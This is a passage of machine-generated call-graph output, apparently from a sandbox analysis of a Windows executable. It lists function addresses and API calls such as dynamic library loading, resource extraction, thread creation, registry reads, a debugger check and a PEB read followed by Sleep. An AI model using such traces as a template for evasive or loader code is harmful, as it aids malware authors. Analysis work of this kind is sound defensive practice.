99109->99098 99111 1a506b 74 API calls 99110->99111 99112 2095cd 99111->99112 99113 1a506b 74 API calls 99112->99113 99114 2095dd 99113->99114 99115 1a506b 74 API calls 99114->99115 99116 2095ed 99115->99116 99612 209b6d GetTempPathW GetTempFileNameW 99116->99612 99118 2095f9 99119 1c548b 115 API calls 99118->99119 99127 20960a 99119->99127 99122 1a506b 74 API calls 99122->99127 99127->99098 99127->99122 99133 2096c4 99127->99133 99613 1c4a93 99127->99613 99626 1c55d6 99133->99626 99136->98919 99137->98956 99138->98969 99188 1a4d61 99139->99188 99142 1a4d3a 99144 1a4d4a FreeLibrary 99142->99144 99145 1a4d53 99142->99145 99143 1a4d61 2 API calls 99143->99142 99144->99145 99146 1c548b 99145->99146 99192 1c54a0 99146->99192 99148 1a4f5c 99148->99008 99148->99009 99350 1a4d94 99149->99350 99152 1a4d94 2 API calls 99155 1a4ced 99152->99155 99153 1a4d08 99156 1a4dd0 99153->99156 99154 1a4cff FreeLibrary 99154->99153 99155->99153 99155->99154 99157 1c0ff6 Mailbox 59 API calls 99156->99157 99158 1a4de5 99157->99158 99159 1a538e 59 API calls 99158->99159 99160 1a4df1 _memmove 99159->99160 99161 1a4e2c 99160->99161 99163 1a4ee9 99160->99163 99164 1a4f21 99160->99164 99162 1a5027 69 API calls 99161->99162 99167 1a4e35 99162->99167 99354 1a4fe9 CreateStreamOnHGlobal 99163->99354 99365 209ba5 95 API calls 99164->99365 99168 1a506b 74 API calls 99167->99168 99170 1ddcd0 99167->99170 99174 1a4ec9 99167->99174 99360 1a5045 99167->99360 99168->99167 99171 1a5045 85 API calls 99170->99171 99172 1ddce4 99171->99172 99173 1a506b 74 API calls 99172->99173 99173->99174 99174->99016 99176 1a507d 99175->99176 99177 1dddf6 99175->99177 99389 1c5812 99176->99389 99180 209393 99587 2091e9 99180->99587 99182 2093a9 99182->99024 99184 1dddb9 99183->99184 99185 1a5036 99183->99185 99592 1c5e90 99185->99592 99187 1a503e 99189 1a4d2e 99188->99189 99190 1a4d6a LoadLibraryA 99188->99190 99189->99142 99189->99143 99190->99189 99191 1a4d7b GetProcAddress 99190->99191 99191->99189 99195 1c54ac __alloc_osfhnd 99192->99195 99193 1c54bf 99241 1c8d68 58 API calls __getptd_noexit 99193->99241 99195->99193 99197 1c54f0 99195->99197 99196 1c54c4 99242 1c8ff6 9 API calls __lseeki64 99196->99242 99211 1d0738 99197->99211 99200 1c54f5 99201 1c54fe 99200->99201 99202 1c550b 99200->99202 99243 1c8d68 58 API calls __getptd_noexit 99201->99243 99204 1c5535 99202->99204 99205 1c5515 99202->99205 99226 1d0857 99204->99226 99244 1c8d68 58 API calls __getptd_noexit 99205->99244 99206 1c54cf __alloc_osfhnd @_EH4_CallFilterFunc@8 99206->99148 99212 1d0744 __alloc_osfhnd 99211->99212 99213 1c9e4b __lock 58 API calls 99212->99213 99224 1d0752 99213->99224 99214 1d07cd 99251 1c8a5d 58 API calls 2 library calls 99214->99251 99215 1d07c6 99246 1d084e 99215->99246 99218 1d07d4 99218->99215 99252 1ca06b InitializeCriticalSectionAndSpinCount 99218->99252 99219 1d0843 __alloc_osfhnd 99219->99200 99221 1c9ed3 __mtinitlocknum 58 API calls 99221->99224 99223 1d07fa EnterCriticalSection 99223->99215 99224->99214 99224->99215 99224->99221 99249 1c6e8d 59 API calls __lock 99224->99249 99250 1c6ef7 LeaveCriticalSection LeaveCriticalSection _doexit 99224->99250 99234 1d0877 __wopenfile 99226->99234 99227 1d0891 99257 1c8d68 58 API calls __getptd_noexit 99227->99257 99229 1d0896 99258 1c8ff6 9 API calls __lseeki64 99229->99258 99231 1c5540 99245 1c5562 LeaveCriticalSection LeaveCriticalSection _fseek 99231->99245 99232 1d0aaf 99254 1d87f1 99232->99254 99234->99227 99240 1d0a4c 99234->99240 99259 1c3a0b 60 API calls 2 library calls 99234->99259 99236 1d0a45 99236->99240 99260 1c3a0b 60 API calls 2 library calls 99236->99260 99238 1d0a64 99238->99240 99261 1c3a0b 60 API calls 2 library calls 99238->99261 99240->99227 99240->99232 99241->99196 99242->99206 99243->99206 99244->99206 99245->99206 99253 1c9fb5 LeaveCriticalSection 99246->99253 99248 1d0855 99248->99219 99249->99224 99250->99224 99251->99218 99252->99223 99253->99248 99262 1d7fd5 99254->99262 99256 1d880a 99256->99231 99257->99229 99258->99231 99259->99236 99260->99238 99261->99240 99263 1d7fe1 __alloc_osfhnd 99262->99263 99264 1d7ff7 99263->99264 99266 1d802d 99263->99266 99347 1c8d68 58 API calls __getptd_noexit 99264->99347 99273 1d809e 99266->99273 99267 1d7ffc 99348 1c8ff6 9 API calls __lseeki64 99267->99348 99270 1d8049 99349 1d8072 LeaveCriticalSection __unlock_fhandle 99270->99349 99272 1d8006 __alloc_osfhnd 99272->99256 99274 1d80be 99273->99274 99275 1c471a __wsopen_nolock 58 API calls 99274->99275 99278 1d80da 99275->99278 99276 1c9006 __invoke_watson 8 API calls 99277 1d87f0 99276->99277 99280 1d7fd5 __wsopen_helper 103 API calls 99277->99280 99279 1d8114 99278->99279 99286 1d8137 99278->99286 99323 1d8211 99278->99323 99281 1c8d34 __lseeki64 58 API calls 99279->99281 99282 1d880a 99280->99282 99283 1d8119 99281->99283 99282->99270 99284 1c8d68 __lseeki64 58 API calls 99283->99284 99285 1d8126 99284->99285 99288 1c8ff6 __lseeki64 9 API calls 99285->99288 99287 1d81f5 99286->99287 99295 1d81d3 99286->99295 99289 1c8d34 __lseeki64 58 API calls 99287->99289 99290 1d8130 99288->99290 99291 1d81fa 99289->99291 99290->99270 99292 1c8d68 __lseeki64 58 API calls 99291->99292 99293 1d8207 99292->99293 99294 1c8ff6 __lseeki64 9 API calls 99293->99294 99294->99323 99296 1cd4d4 __alloc_osfhnd 61 API calls 99295->99296 99297 1d82a1 99296->99297 99298 1d82ce 99297->99298 99299 1d82ab 99297->99299 99300 1d7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99298->99300 99301 1c8d34 __lseeki64 58 API calls 99299->99301 99309 1d82f0 99300->99309 99302 1d82b0 99301->99302 99304 1c8d68 __lseeki64 58 API calls 99302->99304 99303 1d836e GetFileType 99307 1d8379 GetLastError 99303->99307 99308 1d83bb 99303->99308 99306 1d82ba 99304->99306 99305 1d833c GetLastError 99310 1c8d47 __dosmaperr 58 API calls 99305->99310 99311 1c8d68 __lseeki64 58 API calls 99306->99311 99312 1c8d47 __dosmaperr 58 API calls 99307->99312 99318 1cd76a __set_osfhnd 59 API calls 99308->99318 99309->99303 99309->99305 99314 1d7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99309->99314 99315 1d8361 99310->99315 99311->99290 99313 1d83a0 CloseHandle 99312->99313 99313->99315 99316 1d83ae 99313->99316 99317 1d8331 99314->99317 99320 1c8d68 __lseeki64 58 API calls 99315->99320 99319 1c8d68 __lseeki64 58 API calls 99316->99319 99317->99303 99317->99305 99322 1d83d9 99318->99322 99321 1d83b3 99319->99321 99320->99323 99321->99315 99324 1d8594 99322->99324 99325 1d1b11 __lseeki64_nolock 60 API calls 99322->99325 99342 1d845a 99322->99342 99323->99276 99324->99323 99326 1d8767 CloseHandle 99324->99326 99327 1d8443 99325->99327 99328 1d7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99326->99328 99329 1c8d34 __lseeki64 58 API calls 99327->99329 99327->99342 99331 1d878e 99328->99331 99329->99342 99330 1d10ab 70 API calls __read_nolock 99330->99342 99332 1d87c2 99331->99332 99333 1d8796 GetLastError 99331->99333 99332->99323 99334 1c8d47 __dosmaperr 58 API calls 99333->99334 99335 1d87a2 99334->99335 99338 1cd67d __free_osfhnd 59 API calls 99335->99338 99336 1d0d2d __close_nolock 61 API calls 99336->99342 99337 1d848c 99339 1d99f2 __chsize_nolock 82 API calls 99337->99339 99337->99342 99338->99332 99339->99337 99340 1cdac6 __write 78 API calls 99340->99342 99341 1d8611 99343 1d0d2d __close_nolock 61 API calls 99341->99343 99342->99324 99342->99330 99342->99336 99342->99337 99342->99340 99342->99341 99344 1d1b11 60 API calls __lseeki64_nolock 99342->99344 99345 1d8618 99343->99345 99344->99342 99346 1c8d68 __lseeki64 58 API calls 99345->99346 99346->99323 99347->99267 99348->99272 99349->99272 99351 1a4ce1 99350->99351 99352 1a4d9d LoadLibraryA 99350->99352 99351->99152 99351->99155 99352->99351 99353 1a4dae GetProcAddress 99352->99353 99353->99351 99355 1a5003 FindResourceExW 99354->99355 99357 1a5020 99354->99357 99356 1ddd5c LoadResource 99355->99356 99355->99357 99356->99357 99358 1ddd71 SizeofResource 99356->99358 99357->99161 99358->99357 99359 1ddd85 LockResource 99358->99359 99359->99357 99361 1a5054 99360->99361 99364 1dddd4 99360->99364 99366 1c5a7d 99361->99366 99363 1a5062 99363->99167 99365->99161 99367 1c5a89 __alloc_osfhnd 99366->99367 99368 1c5a9b 99367->99368 99369 1c5ac1 99367->99369 99379 1c8d68 58 API calls __getptd_noexit 99368->99379 99381 1c6e4e 99369->99381 99372 1c5aa0 99380 1c8ff6 9 API calls __lseeki64 99372->99380 99376 1c5ad6 99388 1c5af8 LeaveCriticalSection LeaveCriticalSection _fseek 99376->99388 99378 1c5aab __alloc_osfhnd 99378->99363 99379->99372 99380->99378 99382 1c6e5e 99381->99382 99383 1c6e80 EnterCriticalSection 99381->99383 99382->99383 99384 1c6e66 99382->99384 99385 1c5ac7 99383->99385 99386 1c9e4b __lock 58 API calls 99384->99386 99387 1c59ee 83 API calls 5 library calls 99385->99387 99386->99385 99387->99376 99388->99378 99392 1c582d 99389->99392 99391 1a508e 99391->99180 99393 1c5839 __alloc_osfhnd 99392->99393 99394 1c587c 99393->99394 99395 1c5874 __alloc_osfhnd 99393->99395 99400 1c584f _memset 99393->99400 99396 1c6e4e __lock_file 59 API calls 99394->99396 99395->99391 99398 1c5882 99396->99398 99405 1c564d 99398->99405 99419 1c8d68 58 API calls __getptd_noexit 99400->99419 99401 1c5869 99420 1c8ff6 9 API calls __lseeki64 99401->99420 99408 1c5668 _memset 99405->99408 99410 1c5683 99405->99410 99406 1c5673 99517 1c8d68 58 API calls __getptd_noexit 99406->99517 99408->99406 99408->99410 99415 1c56c3 99408->99415 99421 1c58b6 LeaveCriticalSection LeaveCriticalSection _fseek 99410->99421 99412 1c57d4 _memset 99520 1c8d68 58 API calls __getptd_noexit 99412->99520 99415->99410 99415->99412 99422 1c4916 99415->99422 99429 1d10ab 99415->99429 99497 1d0df7 99415->99497 99519 1d0f18 58 API calls 3 library calls 99415->99519 99418 1c5678 99518 1c8ff6 9 API calls __lseeki64 99418->99518 99419->99401 99420->99395 99421->99395 99423 1c4935 99422->99423 99424 1c4920 99422->99424 99423->99415 99521 1c8d68 58 API calls __getptd_noexit 99424->99521 99426 1c4925 99522 1c8ff6 9 API calls __lseeki64 99426->99522 99428 1c4930 99428->99415 99430 1d10cc 99429->99430 99431 1d10e3 99429->99431 99532 1c8d34 58 API calls __getptd_noexit 99430->99532 99433 1d181b 99431->99433 99438 1d111d 99431->99438 99548 1c8d34 58 API calls __getptd_noexit 99433->99548 99435 1d10d1 99533 1c8d68 58 API calls __getptd_noexit 99435->99533 99436 1d1820 99549 1c8d68 58 API calls __getptd_noexit 99436->99549 99440 1d1125 99438->99440 99446 1d113c 99438->99446 99534 1c8d34 58 API calls __getptd_noexit 99440->99534 99441 1d1131 99550 1c8ff6 9 API calls __lseeki64 99441->99550 99442 1d10d8 99442->99415 99444 1d112a 99535 1c8d68 58 API calls __getptd_noexit 99444->99535 99446->99442 99447 1d1151 99446->99447 99450 1d116b 99446->99450 99451 1d1189 99446->99451 99536 1c8d34 58 API calls __getptd_noexit 99447->99536 99450->99447 99455 1d1176 99450->99455 99537 1c8a5d 58 API calls 2 library calls 99451->99537 99453 1d1199 99456 1d11bc 99453->99456 99457 1d11a1 99453->99457 99523 1d5ebb 99455->99523 99540 1d1b11 60 API calls 3 library calls 99456->99540 99538 1c8d68 58 API calls __getptd_noexit 99457->99538 99458 1d128a 99460 1d1303 ReadFile 99458->99460 99465 1d12a0 GetConsoleMode 99458->99465 99463 1d1325 99460->99463 99464 1d17e3 GetLastError 99460->99464 99462 1d11a6 99539 1c8d34 58 API calls __getptd_noexit 99462->99539 99463->99464 99471 1d12f5 99463->99471 99467 1d12e3 99464->99467 99468 1d17f0 99464->99468 99469 1d12b4 99465->99469 99470 1d1300 99465->99470 99490 1d12e9 99467->99490 99541 1c8d47 58 API calls 2 library calls 99467->99541 99546 1c8d68 58 API calls __getptd_noexit 99468->99546 99469->99470 99473 1d12ba ReadConsoleW 99469->99473 99470->99460 99480 1d135a 99471->99480 99482 1d15c7 99471->99482 99471->99490 99473->99471 99475 1d12dd GetLastError 99473->99475 99474 1d17f5 99547 1c8d34 58 API calls __getptd_noexit 99474->99547 99475->99467 99478 1c2f95 _free 58 API calls 99478->99442 99481 1d13c6 ReadFile 99480->99481 99487 1d1447 99480->99487 99484 1d13e7 GetLastError 99481->99484 99495 1d13f1 99481->99495 99483 1d16cd ReadFile 99482->99483 99482->99490 99489 1d16f0 GetLastError 99483->99489 99496 1d16fe 99483->99496 99484->99495 99485 1d1504 99491 1d14b4 MultiByteToWideChar 99485->99491 99544 1d1b11 60 API calls 3 library calls 99485->99544 99486 1d14f4 99543 1c8d68 58 API calls __getptd_noexit 99486->99543 99487->99485 99487->99486 99487->99490 99487->99491 99489->99496 99490->99442 99490->99478 99491->99475 99491->99490 99495->99480 99542 1d1b11 60 API calls 3 library calls 99495->99542 99496->99482 99545 1d1b11 60 API calls 3 library calls 99496->99545 99498 1d0e02 99497->99498 99502 1d0e17 99497->99502 99584 1c8d68 58 API calls __getptd_noexit 99498->99584 99500 1d0e07 99585 1c8ff6 9 API calls __lseeki64 99500->99585 99503 1d0e4c 99502->99503 99509 1d0e12 99502->99509 99586 1d6234 58 API calls __malloc_crt 99502->99586 99505 1c4916 __stbuf 58 API calls 99503->99505 99506 1d0e60 99505->99506 99551 1d0f97 99506->99551 99508 1d0e67 99508->99509 99510 1c4916 __stbuf 58 API calls 99508->99510 99509->99415 99511 1d0e8a 99510->99511 99511->99509 99512 1c4916 __stbuf 58 API calls 99511->99512 99513 1d0e96 99512->99513 99513->99509 99514 1c4916 __stbuf 58 API calls 99513->99514 99515 1d0ea3 99514->99515 99516 1c4916 __stbuf 58 API calls 99515->99516 99516->99509 99517->99418 99518->99410 99519->99415 99520->99418 99521->99426 99522->99428 99524 1d5ec6 99523->99524 99525 1d5ed3 99523->99525 99526 1c8d68 __lseeki64 58 API calls 99524->99526 99528 1d5edf 99525->99528 99529 1c8d68 __lseeki64 58 API calls 99525->99529 99527 1d5ecb 99526->99527 99527->99458 99528->99458 99530 1d5f00 99529->99530 99531 1c8ff6 __lseeki64 9 API calls 99530->99531 99531->99527 99532->99435 99533->99442 99534->99444 99535->99441 99536->99444 99537->99453 99538->99462 99539->99442 99540->99455 99541->99490 99542->99495 99543->99490 99544->99491 99545->99496 99546->99474 99547->99490 99548->99436 99549->99441 99550->99442 99552 1d0fa3 __alloc_osfhnd 99551->99552 99553 1d0fb0 99552->99553 99554 1d0fc7 99552->99554 99556 1c8d34 __lseeki64 58 API calls 99553->99556 99555 1d108b 99554->99555 99557 1d0fdb 99554->99557 99558 1c8d34 __lseeki64 58 API calls 99555->99558 99559 1d0fb5 99556->99559 99560 1d0ff9 99557->99560 99561 1d1006 99557->99561 99562 1d0ffe 99558->99562 99563 1c8d68 __lseeki64 58 API calls 99559->99563 99564 1c8d34 __lseeki64 58 API calls 99560->99564 99565 1d1028 99561->99565 99566 1d1013 99561->99566 99569 1c8d68 __lseeki64 58 API calls 99562->99569 99575 1d0fbc __alloc_osfhnd 99563->99575 99564->99562 99568 1cd446 ___lock_fhandle 59 API calls 99565->99568 99567 1c8d34 __lseeki64 58 API calls 99566->99567 99571 1d1018 99567->99571 99572 1d102e 99568->99572 99570 1d1020 99569->99570 99578 1c8ff6 __lseeki64 9 API calls 99570->99578 99576 1c8d68 __lseeki64 58 API calls 99571->99576 99573 1d1054 99572->99573 99574 1d1041 99572->99574 99579 1c8d68 __lseeki64 58 API calls 99573->99579 99577 1d10ab __read_nolock 70 API calls 99574->99577 99575->99508 99576->99570 99580 1d104d 99577->99580 99578->99575 99581 1d1059 99579->99581 99583 1d1083 __read LeaveCriticalSection 99580->99583 99582 1c8d34 __lseeki64 58 API calls 99581->99582 99582->99580 99583->99575 99584->99500 99585->99509 99586->99503 99590 1c543a GetSystemTimeAsFileTime 99587->99590 99589 2091f8 99589->99182 99591 1c5468 __aulldiv 99590->99591 99591->99589 99593 1c5e9c __alloc_osfhnd 99592->99593 99594 1c5eae 99593->99594 99595 1c5ec3 99593->99595 99606 1c8d68 58 API calls __getptd_noexit 99594->99606 99597 1c6e4e __lock_file 59 API calls 99595->99597 99599 1c5ec9 99597->99599 99598 1c5eb3 99607 1c8ff6 9 API calls __lseeki64 99598->99607 99608 1c5b00 67 API calls 5 library calls 99599->99608 99602 1c5ed4 99609 1c5ef4 LeaveCriticalSection LeaveCriticalSection _fseek 99602->99609 99603 1c5ebe __alloc_osfhnd 99603->99187 99605 1c5ee6 99605->99603 99606->99598 99607->99603 99608->99602 99609->99605 99610->99066 99611->99068 99612->99118 99614 1c4a9f __alloc_osfhnd 99613->99614 99643 2099d2 __tzset_nolock _wcscmp 99642->99643 99644 1a506b 74 API calls 99643->99644 99645 20949a 99643->99645 99646 209393 GetSystemTimeAsFileTime 99643->99646 99647 1a5045 85 API calls 99643->99647 99644->99643 99645->99098 99648 1c432e 58 API calls __wsplitpath_helper 99645->99648 99646->99643 99647->99643 99648->99101 99649->99109 99968 1a1016 99973 1a4ad2 99968->99973 99971 1c2f80 __cinit 67 API calls 99972 1a1025 99971->99972 99974 1c0ff6 Mailbox 59 API calls 99973->99974 99975 1a4ada 99974->99975 99976 1a101b 99975->99976 99980 1a4a94 99975->99980 99976->99971 99981 1a4a9d 99980->99981 99982 1a4aaf 99980->99982 99983 1c2f80 __cinit 67 API calls 99981->99983 99984 1a4afe 99982->99984 99983->99982 99985 1a77c7 59 API calls 99984->99985 99986 1a4b16 GetVersionExW 99985->99986 99987 1a7d2c 59 API calls 99986->99987 99988 1a4b59 99987->99988 99989 1a7e8c 59 API calls 99988->99989 100000 1a4b86 99988->100000 99990 1a4b7a 99989->99990 99991 1a7886 59 API calls 99990->99991 99991->100000 99992 1a4bf1 GetCurrentProcess IsWow64Process 99993 1a4c0a 99992->99993 99995 1a4c89 GetSystemInfo 99993->99995 99996 1a4c20 99993->99996 99994 1ddc8d 99997 1a4c56 99995->99997 100008 1a4c95 99996->100008 99997->99976 100000->99992 100000->99994 100001 1a4c7d GetSystemInfo 100003 1a4c47 100001->100003 100002 1a4c32 100004 1a4c95 2 API calls 100002->100004 100003->99997 100006 1a4c4d FreeLibrary 100003->100006 100005 1a4c3a GetNativeSystemInfo 100004->100005 100005->100003 100006->99997 100009 1a4c2e 100008->100009 100010 1a4c9e LoadLibraryA 100008->100010 100009->100001 100009->100002 100010->100009 100011 1a4caf GetProcAddress 100010->100011 100011->100009 100012 1a1066 100017 1af8cf 100012->100017 100014 1a106c 100015 1c2f80 __cinit 67 API calls 100014->100015 100016 1a1076 100015->100016 100018 1af8f0 100017->100018 100050 1c0143 100018->100050 100022 1af937 100023 1a77c7 59 API calls 100022->100023 100024 1af941 100023->100024 100025 1a77c7 59 API calls 100024->100025 100026 1af94b 100025->100026 100027 1a77c7 59 API calls 100026->100027 100028 1af955 100027->100028 100029 1a77c7 59 API calls 100028->100029 100030 1af993 100029->100030 100031 1a77c7 59 API calls 100030->100031 100032 1afa5e 100031->100032 100060 1b60e7 100032->100060 100036 1afa90 100037 1a77c7 59 API calls 100036->100037 100038 1afa9a 100037->100038 100088 1bffde 100038->100088 100040 1afae1 100041 1afaf1 GetStdHandle 100040->100041 100042 1afb3d 100041->100042 100043 1e49d5 100041->100043 100044 1afb45 OleInitialize 100042->100044 100043->100042 100045 1e49de 100043->100045 100044->100014 100095 206dda 64 API calls Mailbox 100045->100095 100047 1e49e5 100096 2074a9 CreateThread 100047->100096 100049 1e49f1 CloseHandle 100049->100044 100097 1c021c 100050->100097 100053 1c021c 59 API calls 100054 1c0185 100053->100054 100055 1a77c7 59 API calls 100054->100055 100056 1c0191 100055->100056 100057 1a7d2c 59 API calls 100056->100057 100058 1af8f6 100057->100058 100059 1c03a2 6 API calls 100058->100059 100059->100022 100061 1a77c7 59 API calls 100060->100061 100062 1b60f7 100061->100062 100063 1a77c7 59 API calls 100062->100063 100064 1b60ff 100063->100064 100104 1b5bfd 100064->100104 100067 1b5bfd 59 API calls 100068 1b610f 100067->100068 100069 1a77c7 59 API calls 100068->100069 100070 1b611a 100069->100070 100071 1c0ff6 Mailbox 59 API calls 100070->100071 100072 1afa68 100071->100072 100073 1b6259 100072->100073 100074 1b6267 100073->100074 100075 1a77c7 59 API calls 100074->100075 100076 1b6272 100075->100076 100077 1a77c7 59 API calls 100076->100077 100078 1b627d 100077->100078 100079 1a77c7 59 API calls 100078->100079 100080 1b6288 100079->100080 100081 1a77c7 59 API calls 100080->100081 100082 1b6293 100081->100082 100083 1b5bfd 59 API calls 100082->100083 100084 1b629e 100083->100084 100085 1c0ff6 Mailbox 59 API calls 100084->100085 100086 1b62a5 RegisterWindowMessageW 100085->100086 100086->100036 100089 1bffee 100088->100089 100090 1f5cc3 100088->100090 100091 1c0ff6 Mailbox 59 API calls 100089->100091 100107 209d71 60 API calls 100090->100107 100093 1bfff6 100091->100093 100093->100040 100094 1f5cce 100095->100047 100096->100049 100108 20748f 65 API calls 100096->100108 100098 1a77c7 59 API calls 100097->100098 100099 1c0227 100098->100099 100100 1a77c7 59 API calls 100099->100100 100101 1c022f 100100->100101 100102 1a77c7 59 API calls 100101->100102 100103 1c017b 100102->100103 100103->100053 100105 1a77c7 59 API calls 100104->100105 100106 1b5c05 100105->100106 100106->100067 100107->100094 100109 34d23b0 100123 34d0000 100109->100123 100111 34d244a 100126 34d22a0 100111->100126 100129 34d3470 GetPEB 100123->100129 100125 34d068b 100125->100111 100127 34d22a9 Sleep 100126->100127 100128 34d22b7 100127->100128 100130 34d349a 100129->100130 100130->100125 100131 1a1055 100136 1a2649 100131->100136 100134 1c2f80 __cinit 67 API calls 100135 1a1064 100134->100135 100137 1a77c7 59 API calls 100136->100137 100138 1a26b7 100137->100138 100143 1a3582 100138->100143 100141 1a2754 100142 1a105a 100141->100142 100146 1a3416 59 API calls 2 library calls 100141->100146 100142->100134 100147 1a35b0 100143->100147 100146->100141 100148 1a35bd 100147->100148 100149 1a35a1 100147->100149 100148->100149 100150 1a35c4 RegOpenKeyExW 100148->100150 100149->100141 100150->100149 100151 1a35de RegQueryValueExW 100150->100151 100152 1a35ff 100151->100152 100153 1a3614 RegCloseKey 100151->100153 100152->100153 100153->100149 100154 1c7e93 100155 1c7e9f __alloc_osfhnd 100154->100155 100191 1ca048 GetStartupInfoW 100155->100191 100157 1c7ea4 100193 1c8dbc GetProcessHeap 100157->100193 100159 1c7efc 100160 1c7f07 100159->100160 100276 1c7fe3 58 API calls 3 library calls 100159->100276 100194 1c9d26 100160->100194 100163 1c7f0d 100164 1c7f18 __RTC_Initialize 100163->100164 100277 1c7fe3 58 API calls 3 library calls 100163->100277 100215 1cd812 100164->100215 100167 1c7f27 100168 1c7f33 GetCommandLineW 100167->100168 100278 1c7fe3 58 API calls 3 library calls 100167->100278 100234 1d5173 GetEnvironmentStringsW 100168->100234 100171 1c7f32 100171->100168 100174 1c7f4d 100175 1c7f58 100174->100175 100279 1c32f5 58 API calls 3 library calls 100174->100279 100244 1d4fa8 100175->100244 100178 1c7f5e 100179 1c7f69 100178->100179 100280 1c32f5 58 API calls 3 library calls 100178->100280 100258 1c332f 100179->100258 100182 1c7f71 100183 1c7f7c __wwincmdln 100182->100183 100281 1c32f5 58 API calls 3 library calls 100182->100281 100264 1a492e 100183->100264 100186 1c7f90 100187 1c7f9f 100186->100187 100282 1c3598 58 API calls _doexit 100186->100282 100283 1c3320 58 API calls _doexit 100187->100283 100190 1c7fa4 __alloc_osfhnd 100192 1ca05e 100191->100192 100192->100157 100193->100159 100284 1c33c7 36 API calls 2 library calls 100194->100284 100196 1c9d2b 100285 1c9f7c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 100196->100285 100198 1c9d30 100199 1c9d34 100198->100199 100287 1c9fca TlsAlloc 100198->100287 100286 1c9d9c 61 API calls 2 library calls 100199->100286 100202 1c9d39 100202->100163 100203 1c9d46 100203->100199 100204 1c9d51 100203->100204 100288 1c8a15 100204->100288 100207 1c9d93 100296 1c9d9c 61 API calls 2 library calls 100207->100296 100210 1c9d72 100210->100207 100212 1c9d78 100210->100212 100211 1c9d98 100211->100163 100295 1c9c73 58 API calls 4 library calls 100212->100295 100214 1c9d80 GetCurrentThreadId 100214->100163 100216 1cd81e __alloc_osfhnd 100215->100216 100217 1c9e4b __lock 58 API calls 100216->100217 100218 1cd825 100217->100218 100219 1c8a15 __calloc_crt 58 API calls 100218->100219 100220 1cd836 100219->100220 100221 1cd8a1 GetStartupInfoW 100220->100221 100222 1cd841 __alloc_osfhnd @_EH4_CallFilterFunc@8 100220->100222 100228 1cd8b6 100221->100228 100229 1cd9e5 100221->100229 100222->100167 100223 1cdaad 100310 1cdabd LeaveCriticalSection _doexit 100223->100310 100225 1c8a15 __calloc_crt 58 API calls 100225->100228 100226 1cda32 GetStdHandle 100226->100229 100227 1cda45 GetFileType 100227->100229 100228->100225 100228->100229 100231 1cd904 100228->100231 100229->100223 100229->100226 100229->100227 100309 1ca06b InitializeCriticalSectionAndSpinCount 100229->100309 100230 1cd938 GetFileType 100230->100231 100231->100229 100231->100230 100308 1ca06b InitializeCriticalSectionAndSpinCount 100231->100308 100235 1c7f43 100234->100235 100236 1d5184 100234->100236 100240 1d4d6b GetModuleFileNameW 100235->100240 100311 1c8a5d 58 API calls 2 library calls 100236->100311 100238 1d51aa _memmove 100239 1d51c0 FreeEnvironmentStringsW 100238->100239 100239->100235 100241 1d4d9f _wparse_cmdline 100240->100241 100243 1d4ddf _wparse_cmdline 100241->100243 100312 1c8a5d 58 API calls 2 library calls 100241->100312 100243->100174 100245 1d4fc1 __NMSG_WRITE 100244->100245 100249 1d4fb9 100244->100249 100246 1c8a15 __calloc_crt 58 API calls 100245->100246 100254 1d4fea __NMSG_WRITE 100246->100254 100247 1d5041 100248 1c2f95 _free 58 API calls 100247->100248 100248->100249 100249->100178 100250 1c8a15 __calloc_crt 58 API calls 100250->100254 100251 1d5066 100253 1c2f95 _free 58 API calls 100251->100253 100253->100249 100254->100247 100254->100249 100254->100250 100254->100251 100255 1d507d 100254->100255 100313 1d4857 58 API calls __lseeki64 100254->100313 100314 1c9006 IsProcessorFeaturePresent 100255->100314 100257 1d5089 100257->100178 100260 1c333b __IsNonwritableInCurrentImage 100258->100260 100329 1ca711 100260->100329 100261 1c3359 __initterm_e 100262 1c2f80 __cinit 67 API calls 100261->100262 100263 1c3378 __cinit __IsNonwritableInCurrentImage 100261->100263 100262->100263 100263->100182 100265 1a4948 100264->100265 100275 1a49e7 100264->100275 100266 1a4982 IsThemeActive 100265->100266 100332 1c35ac 100266->100332 100270 1a49ae 100344 1a4a5b SystemParametersInfoW SystemParametersInfoW 100270->100344 100272 1a49ba 100345 1a3b4c 100272->100345 100274 1a49c2 SystemParametersInfoW 100274->100275 100275->100186 100276->100160 100277->100164 100278->100171 100282->100187 100283->100190 100284->100196 100285->100198 100286->100202 100287->100203 100291 1c8a1c 100288->100291 100290 1c8a57 100290->100207 100294 1ca026 TlsSetValue 100290->100294 100291->100290 100293 1c8a3a 100291->100293 100297 1d5446 100291->100297 100293->100290 100293->100291 100305 1ca372 Sleep 100293->100305 100294->100210 100295->100214 100296->100211 100298 1d5451 100297->100298 100302 1d546c 100297->100302 100299 1d545d 100298->100299 100298->100302 100306 1c8d68 58 API calls __getptd_noexit 100299->100306 100301 1d547c HeapAlloc 100301->100302 100303 1d5462 100301->100303 100302->100301 100302->100303 100307 1c35e1 DecodePointer 100302->100307 100303->100291 100305->100293 100306->100303 100307->100302 100308->100231 100309->100229 100310->100222 100311->100238 100312->100243 100313->100254 100315 1c9011 100314->100315 100320 1c8e99 100315->100320 100319 1c902c 100319->100257 100321 1c8eb3 _memset ___raise_securityfailure 100320->100321 100322 1c8ed3 IsDebuggerPresent 100321->100322 100328 1ca395 SetUnhandledExceptionFilter UnhandledExceptionFilter 100322->100328 100324 1c8f97 ___raise_securityfailure 100325 1cc836 __fltin2 6 API calls 100324->100325 100326 1c8fba 100325->100326 100327 1ca380 GetCurrentProcess TerminateProcess 100326->100327 100327->100319 100328->100324 100330 1ca714 EncodePointer 100329->100330 100330->100330 100331 1ca72e 100330->100331 100331->100261 100333 1c9e4b __lock 58 API calls 100332->100333 100334 1c35b7 DecodePointer EncodePointer 100333->100334 100397 1c9fb5 LeaveCriticalSection 100334->100397 100336 1a49a7 100337 1c3614 100336->100337 100338 1c361e 100337->100338 100339 1c3638 100337->100339 100338->100339 100398 1c8d68 58 API calls __getptd_noexit 100338->100398 100339->100270 100341 1c3628 100399 1c8ff6 9 API calls __lseeki64 100341->100399 100343 1c3633 100343->100270 100344->100272 100346 1a3b59 __write_nolock 100345->100346 100347 1a77c7 59 API calls 100346->100347 100348 1a3b63 GetCurrentDirectoryW 100347->100348 100400 1a3778 100348->100400 100350 1a3b8c IsDebuggerPresent 100351 1dd4ad MessageBoxA 100350->100351 100352 1a3b9a 100350->100352 100353 1dd4c7 100351->100353 100352->100353 100354 1a3bb7 100352->100354 100383 1a3c73 100352->100383 100599 1a7373 59 API calls Mailbox 100353->100599 100481 1a73e5 100354->100481 100355 1a3c7a 